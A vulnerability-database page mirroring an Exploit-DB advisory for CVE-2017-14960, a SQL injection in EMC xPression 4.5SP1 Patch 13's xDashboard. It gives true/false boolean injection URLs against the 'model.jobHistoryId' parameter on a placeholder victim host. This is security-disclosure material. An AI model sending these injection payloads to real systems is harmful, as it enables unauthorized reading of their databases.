Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection

🗓️ 03 Jan 2018 00:00:00Reported by Pawel GocylaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 46 Views

EMC xPression 4.5SP1 Patch 13 SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		EMC xPression 4.5SP1 Patch 13 SQL Injection Vulnerability
3 Jan 201800:00
zdt
CNVD		OpenText Document Sciences xPression xDashboard SQL Injection Vulnerability
4 Jan 201800:00
cnvd
CVE		CVE-2017-14960
4 Jan 201817:00
cve
Cvelist		CVE-2017-14960
4 Jan 201817:00
cvelist
EUVD		EUVD-2017-6436
7 Oct 202500:30
euvd
exploitpack		EMC xPression 4.5SP1 Patch 13 - model.jobHistoryId SQL Injection
3 Jan 201800:00
exploitpack
NVD		CVE-2017-14960
4 Jan 201817:29
nvd
Packet Storm		EMC xPression 4.5SP1 Patch 13 SQL Injection
3 Jan 201800:00
packetstorm
Prion		Sql injection
4 Jan 201817:29
prion
Title: EMC xDashboard - SQL Injection Vulnerability
Author: Pawel Gocyla
Date: 02 January 2018

CVE: CVE-2017-14960


Affected Software:
==================
EMC xPression v4.5SP1 Patch 13
Probably other versions are also vulnerable.


SQL Injection Vulnerability:
==============================
This vulnerability allows an attacker to retrieve information from the
database

Vulnerable parameter: "$model.jobHistoryId"

Exploit:

True Condition:  https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=1
False Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=2

Fix:
====
User input which is putted into sql queries should be properly filtred or
sanitized

References:
============
https://www.owasp.org/index.php/SQL_Injection

Contact:
========
pawellgocyla[at]gmail[dot]com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Jan 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.09496
emc xpressionsql injectionvulnerabilitypatch 13databaseexploitfixowasp
46